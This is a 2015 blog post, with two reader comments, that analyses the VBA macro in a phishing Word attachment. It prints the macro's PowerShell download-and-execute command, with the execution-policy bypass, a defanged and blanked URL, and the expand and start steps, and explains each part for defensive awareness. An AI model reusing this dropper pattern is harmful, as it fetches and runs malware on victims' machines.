Monday, March 16, 2015

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)

I posted a few more details here. Just by the looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The Subject is trying to play on my emotions and get me to be upset that I have an open invoice, but I should know better and realize it's just a trick and never open it. Also the attachment is terribly named with some ugly numbers which should make me cautious as well.

But anyways, let's say I'm stupid and opened this phish. I thought I'd walk through what this is attempting to do. Inside the word document there is a VBA script (Visual Basic for Applications). If you have Macros enabled or click run Macro, then you can become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

  • 1.) First you'll see ...

    cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX

        A.) 'cmd' is your friend command prompt

        B.) '/K' is a parameter being sent to 'cmd' telling it to run the upcoming command and keep the prompt open after it finishes

        C.) 'powershell.exe' is the command to run, and Powershell is your IT administrator's powerful little scripting prompt that gives them the ability to do anything that the User Interface could do but in a scripted fashion.

        D.) '-ExecutionPolicy bypass' is utilized because in general Powershell protects users from malicious scripts, but there are parameters you can pass to 'powershell.exe' that give it a 1-time bypass of those security restrictions and allows something malicious like this to run.

        E.) '-noprofile' is utilized to also try to bypass any tools your company may have running. By default you have a user profile and some scripts that generally run when you open powershell that your company sets up to keep you safe, secure, and make sure all your apps work properly. Using '-noprofile' bypasses those scripts and says just run my 1 evil script without anything else running first.

        F.) Finally we get to the Code, I abbreviated as XXXXXXXCODEXXXXXXXX , but I have more detail below in #2

  • 2.) Second you'll the Powershell script code that tries to download the payload

    (New-Object System.Net.WebClient).DownloadFile('hxxp://','%TEMP%\')

        A.) '(New-Object System.Net.WebClient)' is the equivalent in a high level programming language like of declaring a new variable such as WebClient c = new WebClient(). You are basically creating a powerful object that will allow you to connect to the internet and perform operations.

        B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a function you can call on that powerful WebClient object which makes the downloading and saving of a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp:// ) contains the payload or the evil malware. This could be anything from a KeyLogger, to Ransomware, to anything under the sun. And it's saving it to '%TEMP%\' , so the Windows Temp folder as a normal looking '.cab' file (generally used for things like Windows Updates, etc.).
  • 3.) Third you'll see a command script trying to extract the contents of the CAB file

    'expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe;'

        A.) 'expand' is another windows command that gets run against 'cmd' that is able to extract the contents of a CAB file (CAB files are kinda like ZIP files)
  • 4.) Fourth and finally you'll see a command script trying to execute an EXE

    'start %TEMP%\JIOiodfhioIH.exe;'

        A.) 'start' is another windows command that gets run against an 'exe' that came out of the CAB file. If this command succeeds, then the malware has been run and you're likely infected.

So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.

Boom, you're infected! If you want to prevent this, a good start would be not opening such evily suspicious looking emails :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.


  1. Hey, Im glad I found your blog, as one of my family members received this email, different sender and attachment name, But basically the same, I Also found file in her temp directory.

    Im actually a security analyst in learning, and I have to ask, How did you extract the above information? Can you do a walkthrough on what you did? I used Officemalscanner but it did not recognize the .doc as an office document. I used Strings.exe and found a large chunk of the file was encoded.

    Anyway, I would appreciate if you could do a walkthrough!

    Thanks in advance!

  2. Thanks for the comment and glad I could be of help. Yeah I'll continue to post what I find and some walk-throughs about it. In this case the place I work has advanced malware detection software that caught this file and alerted on it. Since I'm a former developer, I find the actual "code" the most interesting, so I took the code out of the document and did a walk-through on it.

    One of the simplest ways for a user to see if anybody has seen a file as "malicious" before is to run the analysis on It's a free community of people commenting on files they've seen before and whether they're bad or not. Just because it's not found doesn't mean it's "safe" ... but it'll definitely tell you if it's seen the file before and if it's bad.